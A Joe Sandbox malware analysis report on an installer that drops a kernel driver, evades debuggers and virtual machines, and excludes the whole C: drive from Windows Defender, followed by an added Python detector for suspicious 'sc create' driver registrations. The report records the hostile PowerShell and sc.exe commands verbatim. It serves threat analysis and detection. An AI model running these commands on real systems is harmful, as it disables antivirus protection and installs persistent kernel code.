Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpFile created: C:\Users\user\AppData\Local\Temp\is-8H1GS.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exeFile created: C:\Program Files (x86)\Windows NT\tProtect.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpFile created: C:\Users\user\AppData\Local\Temp\is-IAK5G.tmp\update.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpFile created: C:\Program Files (x86)\Windows NT\7zr.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpFile created: C:\Users\user\AppData\Local\Temp\is-8H1GS.tmp\update.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpFile created: C:\Users\user\AppData\Local\Temp\is-IAK5G.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpFile created: C:\Users\user\AppData\Local\Temp\is-8H1GS.tmp\update.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpFile created: C:\Users\user\AppData\Local\Temp\is-IAK5G.tmp\update.vbcJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpFile created: C:\Program Files (x86)\Windows NT\hrsw.vbcJump to dropped file
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
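
Added example, not part of the Joe Sandbox report and not code from the sample: the sc.exe command line recorded above registers a kernel-mode service (type= kernel, start= auto) whose binPath is a file with a .dll extension under C:\Program Files (x86)\Windows NT, written there by the dropped 7zr.exe, and is followed by repeated sc start CleverSoar attempts. The PDB path found in that file ends in TfSysMon.pdb under an objfre_wnet_amd64 directory, which is the WDK naming for a free (release) build targeting the Windows Server 2003 amd64 platform, so the image is an old third-party driver rather than anything built for this installer. The Python below pulls exactly that pattern out of process-creation logs: it parses sc create command lines (sc's `key= value` argument syntax, with the space after the equals sign) and flags kernel-mode registrations whose image is not a .sys file under %SystemRoot%\System32\drivers or that are set to load automatically. The log lines are constructed from the command lines in this report plus two benign registrations for contrast; the drivers-directory rule, the C:\Windows root, and the benign lines are assumptions, and legitimate drivers are also installed from the DriverStore and vendor directories, so treat the path check as a hunting heuristic rather than proof.

```python
"""Flag 'sc create' command lines that register a kernel-mode service from an
unusual image. Added example: stdlib only, input is constructed below."""
import re

# sc.exe syntax is 'sc create <name> key= value ...'; note the space after '='.
SC_CREATE = re.compile(r"\bsc(?:\.exe)?\s+create\s+(?P<name>\S+)\s*(?P<args>.*)", re.IGNORECASE)
SC_ARG = re.compile(r'(?P<key>[A-Za-z]+)=\s*(?P<val>"[^"]*"|\S+)')
# Assumption: drivers normally live here; DriverStore and vendor paths are legitimate too.
DRIVER_DIR = re.compile(r"^[a-z]:\\windows\\system32\\drivers\\", re.IGNORECASE)
KERNEL_TYPES = {"kernel", "filesys"}
AUTO_START = {"boot", "system", "auto"}


def parse_sc_create(cmdline: str):
    """Return (service_name, {lowercased key: value}) for an 'sc create' line, else None."""
    m = SC_CREATE.search(cmdline)
    if not m:
        return None
    args = {k.lower(): v.strip('"') for k, v in SC_ARG.findall(m.group("args"))}
    return m.group("name"), args


def assess(cmdline: str):
    """Return a finding for a suspicious kernel-mode service registration, else None."""
    parsed = parse_sc_create(cmdline)
    if parsed is None:
        return None
    name, args = parsed
    svc_type = args.get("type", "own").lower()  # sc's default is type= own (user mode)
    if svc_type not in KERNEL_TYPES:
        return None
    binpath = args.get("binpath", "")
    reasons = []
    if not binpath.lower().endswith(".sys"):
        reasons.append("kernel-mode image without a .sys extension")
    if not DRIVER_DIR.match(binpath):
        reasons.append("kernel-mode image outside %SystemRoot%\\System32\\drivers")
    if args.get("start", "demand").lower() in AUTO_START:  # sc's default is start= demand
        reasons.append("driver set to load automatically (persistence)")
    if not reasons:
        return None
    return {"service": name, "type": svc_type, "binpath": binpath, "reasons": reasons}


def scan(lines):
    """Apply assess() to every process-creation line and keep the hits."""
    return [f for f in (assess(line) for line in lines) if f]


# Constructed log: the first two lines reproduce the command lines in this report,
# the last two are benign registrations made up for contrast.
SAMPLE_LOG = [
    r'Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto',
    r"Process created: C:\Windows\System32\sc.exe sc start CleverSoar",
    r'Process created: C:\Windows\System32\sc.exe sc create UpdaterSvc binPath= "C:\Program Files\Vendor\updater.exe" start= auto',
    r"Process created: C:\Windows\System32\sc.exe sc create vendordrv type= kernel binPath= C:\Windows\System32\drivers\vendor.sys start= demand",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['service']} ({hit['type']}): {hit['binpath']}")
        for reason in hit["reasons"]:
            print("  -", reason)
```

On a live host the same rule applies to Sysmon event 1 or Security 4688 command lines, or, after the fact, to HKLM\SYSTEM\CurrentControlSet\Services entries whose Type is 1 (kernel driver); confirm a hit by checking the image's Authenticode signature and its hash against a vulnerable-driver blocklist before treating it as more than a lead, since an unsigned or revoked-certificate driver will not load at all on a default Windows 10/11 configuration while an old signed one will.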

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (recorded 4 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (recorded 3 times)
Source: C:\Users\user\Desktop\yvaKqhmD4L.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX (recorded 6 times)
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX (recorded 90 times in succession)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\yvaKqhmD4L.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp; System information queried: FirmwareTableInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 6851
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 2924
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp; Window / User API: threadDelayed 604
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp; Window / User API: threadDelayed 571
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp; Window / User API: threadDelayed 521
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp; Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\hrsw.vbc
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-8H1GS.tmp\_isetup\_setup64.tmp
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Dropped PE file which has not been started: C:\Program Files (x86)\Windows NT\tProtect.dll
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-IAK5G.tmp\update.vbc
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-IAK5G.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-8H1GS.tmp\update.vbc
Source: C:\Program Files (x86)\Windows NT\7zr.exe; API coverage: 7.5 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2916; Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp; Code function: 6_2_6C1EE090 FindFirstFileA,FindClose,FindClose, 6_2_6C1EE090
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 10_2_00CF6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW, 10_2_00CF6868
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 10_2_00CF7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW, 10_2_00CF7496
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 10_2_00CF9C60 GetSystemInfo, 10_2_00CF9C60
Source: yvaKqhmD4L.tmp, 00000001.00000002.1767908498.00000000015C2000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: yvaKqhmD4L.tmp, 00000001.00000002.1767908498.00000000015C2000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\G'd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp; Code function: 6_2_6C073886 NtSetInformationThread 00000000,00000011,00000000,00000000 6_2_6C073886
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp; Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp; Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp; Code function: 6_2_6C203871 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_6C203871
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 10_2_00D757D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount, 10_2_00D757D0
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp; Code function: 6_2_6C20D425 mov eax, dword ptr fs:[00000030h] 6_2_6C20D425
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp; Code function: 6_2_6C20D456 mov eax, dword ptr fs:[00000030h] 6_2_6C20D456
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp; Code function: 6_2_6C20286D mov eax, dword ptr fs:[00000030h] 6_2_6C20286D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp; Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp; Code function: 6_2_6C1FC3AD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_6C1FC3AD

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: tProtect.dll.12.dr; Static PE information: Found potential injection code
Source: C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp; Process created: C:\Users\user\Desktop\yvaKqhmD4L.exe "C:\Users\user\Desktop\yvaKqhmD4L.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp; Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe; Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\is-MIESE.tmp\yvaKqhmD4L.tmp; Code function: 6_2_6C2CA720 cpuid 6_2_6C2CA720
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 10_2_00CFAB2A GetSystemTimeAsFileTime, 10_2_00CFAB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exe; Code function: 10_2_00D90090 GetVersion, 10_2_00D90090
MITRE ATT&CK Matrix (techniques listed per tactic column; the number badges shown next to a technique are kept in brackets)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Command and Scripting Interpreter [2]; Service Execution [1]; Native API [1]; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: Windows Service [1]; DLL Side-Loading [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Access Token Manipulation [1]; Windows Service [1]; Process Injection [111]; DLL Side-Loading [1]; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: Masquerading [11]; Disable or Modify Tools [1]; Virtualization/Sandbox Evasion [231]; Access Token Manipulation [1]; Process Injection [111]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [3]; Software Packing [1]; DLL Side-Loading [1]
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery [1]; Security Software Discovery [421]; Virtualization/Sandbox Evasion [231]; Process Discovery [2]; Application Window Discovery [1]; System Owner/User Discovery [2]; File and Directory Discovery [3]; System Information Discovery [25]; Network Sniffing
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data [1]; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Encrypted Channel [1]; Junk Data; Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot [1]; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID: 1580559; Sample: yvaKqhmD4L.exe; Start date: 25/12/2024; Architecture: WINDOWS; Score: 96)

Signatures on the start node: Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; Found driver which could be used to inject code into processes; 3 other signatures

Process tree (dropped files and signatures are listed under the process they belong to):
yvaKqhmD4L.exe
  dropped: C:\Users\user\AppData\...\yvaKqhmD4L.tmp (PE32)
  yvaKqhmD4L.tmp
    dropped: C:\Users\user\AppData\Local\...\update.vbc (PE32)
    dropped: C:\Users\user\AppData\Local\...\_setup64.tmp (PE32+)
    signature: Adds a directory exclusion to Windows Defender
    yvaKqhmD4L.exe
      dropped: C:\Users\user\AppData\...\yvaKqhmD4L.tmp (PE32)
      yvaKqhmD4L.tmp
        dropped: C:\Users\user\AppData\Local\...\update.vbc (PE32)
        dropped: C:\Program Files (x86)\Windows NT\hrsw.vbc (PE32)
        dropped: C:\Users\user\AppData\Local\...\_setup64.tmp (PE32+)
        dropped: C:\Program Files (x86)\Windows NT\7zr.exe (PE32)
        signatures: Query firmware table information (likely to detect VMs); Protects its processes via BreakOnTermination flag; Hides threads from debuggers; Contains functionality to hide a thread from the debugger
        7zr.exe
          dropped: C:\Program Files (x86)\...\tProtect.dll (PE32+)
          conhost.exe
        7zr.exe
          conhost.exe
        Conhost.exe
    powershell.exe
      signature: Loading BitLocker PowerShell Module
      conhost.exe
      WmiPrvSE.exe
cmd.exe
  sc.exe
    conhost.exe
cmd.exe
  sc.exe
    conhost.exe
31 other processes
  sc.exe (three instances, each starting a conhost.exe)
  27 other processes
    conhost.exe
    26 other processes

Source | Detection | Scanner | Label
yvaKqhmD4L.exe | 12% | Virustotal |
yvaKqhmD4L.exe | 5% | ReversingLabs | Win32.Ransomware.Generic

Source | Detection | Scanner | Label
C:\Program Files (x86)\Windows NT\7zr.exe | 0% | ReversingLabs |
C:\Program Files (x86)\Windows NT\7zr.exe | 0% | Virustotal |
C:\Program Files (x86)\Windows NT\hrsw.vbc | 26% | ReversingLabs |
C:\Program Files (x86)\Windows NT\hrsw.vbc | 38% | Virustotal |
C:\Program Files (x86)\Windows NT\tProtect.dll | 9% | ReversingLabs |
C:\Program Files (x86)\Windows NT\tProtect.dll | 6% | Virustotal |
C:\Users\user\AppData\Local\Temp\is-8H1GS.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\is-8H1GS.tmp\_isetup\_setup64.tmp | 0% | Virustotal |
C:\Users\user\AppData\Local\Temp\is-8H1GS.tmp\update.vbc | 26% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\is-8H1GS.tmp\update.vbc | 38% | Virustotal |
C:\Users\user\AppData\Local\Temp\is-C99HC.tmp\yvaKqhmD4L.tmp | 2% | Virustotal |
C:\Users\user\AppData\Local\Temp\is-IAK5G.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\is-IAK5G.tmp\update.vbc | 26% | ReversingLabs |

No Antivirus matches
No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU | yvaKqhmD4L.exe | false | | high
https://www.remobjects.com/ps | yvaKqhmD4L.exe, 00000000.00000003.1675434407.0000000002CF0000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.exe, 00000000.00000003.1676151340.000000007F5FB000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000001.00000000.1677476688.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, yvaKqhmD4L.tmp, 00000006.00000000.1765909025.0000000000A5D000.00000020.00000001.01000000.00000008.sdmp, yvaKqhmD4L.tmp.0.dr, yvaKqhmD4L.tmp.5.dr | false | | high
https://www.innosetup.com/ | yvaKqhmD4L.exe, 00000000.00000003.1675434407.0000000002CF0000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.exe, 00000000.00000003.1676151340.000000007F5FB000.00000004.00001000.00020000.00000000.sdmp, yvaKqhmD4L.tmp, 00000001.00000000.1677476688.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, yvaKqhmD4L.tmp, 00000006.00000000.1765909025.0000000000A5D000.00000020.00000001.01000000.00000008.sdmp, yvaKqhmD4L.tmp.0.dr, yvaKqhmD4L.tmp.5.dr | false | | high
No contacted IP infos
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1580559
Start date and time: 2024-12-25 07:51:29 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 24s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 110
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Critical Process Termination
Sample name: yvaKqhmD4L.exe (renamed because the original name is a hash value)
Original Sample Name: DEF808BED70D77EC70F201B7F9EDC125295D26128DF9E7E1796311742FC0D00A.exe
Detection: MAL
Classification: mal96.evad.winEXE@128/31@0/0
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 74%
• Number of executed functions: 121
• Number of non-executed functions: 103
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
• Exclude process from analysis (whitelisted): SIHClient.exe
• Excluded IPs from analysis (whitelisted): 4.175.87.197
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
        No simulations
        No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U7a0b#U5e8f_1.1.5.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U7a0b#U5e8f_1.1.1.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U7a0b#U5e8f_1.1.0.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U7a0b#U5e8f_1.1.5.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U7a0b#U5e8f_1.1.6.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U7a0b#U5e8f_1.1.3.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\7zr.exe | #U5b89#U88c5#U7a0b#U5e8f_1.1.2.exe | malicious | Unknown
C:\Program Files (x86)\Windows NT\hrsw.vbc | #U5b89#U88c5#U7a0b#U5e8f_1.1.5.exe | malicious | Unknown
